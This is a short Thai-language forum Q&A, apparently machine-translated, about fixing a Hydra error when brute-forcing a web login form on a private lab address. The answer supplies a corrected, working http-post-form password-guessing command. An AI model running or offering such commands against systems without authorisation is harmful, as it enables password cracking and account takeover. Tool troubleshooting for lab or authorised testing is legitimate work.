ข้อผิดพลาดกำลัง Hydra เดีย

hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!

ฉันไม่แน่ใจว่าทำไมฉันจึงได้รับข้อผิดพลาดเนื่องจากมี ^PASS^ เชือก ไม่มีชื่อผู้ใช้ในแอปพลิเคชัน

URL แบบเต็มของแบบฟอร์มการเข้าสู่ระบบคือ: http://192.168.0.24:1234/

ใครช่วยได้บ้าง

เกี่ยวกับคำถามของคุณ:

1. เมื่อใช้ไฮดราไม่จำเป็นต้องใส่ http:// ก่อนโฮสต์ที่คุณจะโจมตี
2. หากต้องการระบุพอร์ตโปรดใช้ -s ธง.
3. คุณต้องระบุ -l ตั้งค่าสถานะมิฉะนั้นจะเกิดข้อผิดพลาดขึ้น
4. ในคำขอ POST คุณต้องระบุไฟล์ที่จะรับคำขอ POST (เช่น index.php, password.php, validate.php ฯลฯ )
5. และสุดท้าย แต่ไม่ท้ายสุดคุณต้องระบุกรณีที่ประสบความสำเร็จหรือกรณีที่ล้มเหลว

ลองคำสั่งต่อไปนี้เป็นวิธีที่ดีที่สุดที่ฉันสามารถทำได้กับข้อมูลที่ให้ไว้:

hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt

ฉันลองด้วยตัวเองและมันก็ไม่ได้สร้างความผิดพลาดใด ๆ

โชคดี!